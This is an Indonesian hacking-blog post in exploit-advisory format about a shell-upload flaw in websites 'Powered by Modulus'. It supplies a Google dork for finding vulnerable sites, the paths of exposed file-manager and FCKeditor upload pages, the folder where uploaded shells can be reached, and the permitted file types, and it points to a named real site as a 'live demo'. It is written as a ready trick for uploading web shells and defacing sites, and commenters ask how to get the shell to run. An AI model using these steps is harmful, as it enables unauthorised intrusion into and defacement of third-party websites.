Home / Vuln / Powered by Modulus -> Shell Upload Vulnerability
deface-file-upload

Powered by Modulus -> Shell Upload Vulnerability

Assalamualaikum semua nya sahabat Binus Hacker yang berbahagia, kembali bersama saya BadBoy haha, mungkin sudah lama ya saya vakum, kenapa? Karena lagi males aja haha, susah dapetin cewek susah dapetin uang, huaaaa nangis saya.

Baiklah tanpa perlu panjang lebar lagi? mari kita lihat lihat yang satu ini, maaf ya, saya buat seperti ini ๐Ÿ˜‰
# Exploit Title : Site Linux Whm01.ast (Powered by Modulus)ย  –> Shell Upload Vulnerability
# Date : 26-06-2012
# Google Dork : “Powered by Modulus” or inurl:filemanager/libraries/
# Author : BadBoy
# Category : Webapps
# Blog : http://fikri1995.blogspot.com
# Tested On : Windows XP

# Bug : http://localhost/modules/filemanager/libraries/filemanager/filemanager.php

or

http://localhost/modules/fckeditor/libraries/fckeditor/editor/filemanager/connectors/uploadtest.html <—- To know where the path ๐Ÿ™‚

# Shell Access : http://localhost/modules/core/home/2/[HELL] or http://localhost/home/2/[HELL]

#Allowed File : php, html, asp, php4, txt, jpg, and more

#Live Demo : http://lakesidedairy.com/modules/filemanager/libraries/filemanager/filemanager.php

*I give you anythings what do you want, instant, and magic, so enjoyed, and read carefully my tutorial, hope your luck day*

 

Ringkas dan padat, semoga berguna ya ๐Ÿ˜€ caw dulu Pak, Bu, Mas, Mbak. Saya mau nonton haha, trik ini saya temukan tadi malem ni, terinspirasi dari tulisan Mbk Dheย http://dhefebriyana.blogspot.com/2012/06/manifesto-hacker.html itu artikel nya hehe.

Okay la saya pamit dulu ya. Wassalamualaikum

NB: Yang mau copas? Silakan buat direct link ny ke web Binus aja, karena di blog saya gak ada artikel hacking lagi ๐Ÿ˜€

About BadBoy

Saya baik dengan semua orang, asalkan orang itu baik juga kepada saya :) hehe. Big Fans: Manchester City dan Inter Milan

Check Also

php-s3-appo

PHP S3 Appro [Japanese Sites] Vulnerability

Assalamualaikum sahabat B|H, Baik aja ya semoga, karena hari ini saya mau posting seputar proof …

6 comments

  1. MANTAB GAN THANKS INFO NYA

  2. @Atok: Buat di makan gan ๐Ÿ™‚ hehe

  3. shell nya gak bisa dieksekusi gan …
    bentuk text …

  4. cara lihat hasilnya gmana?

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *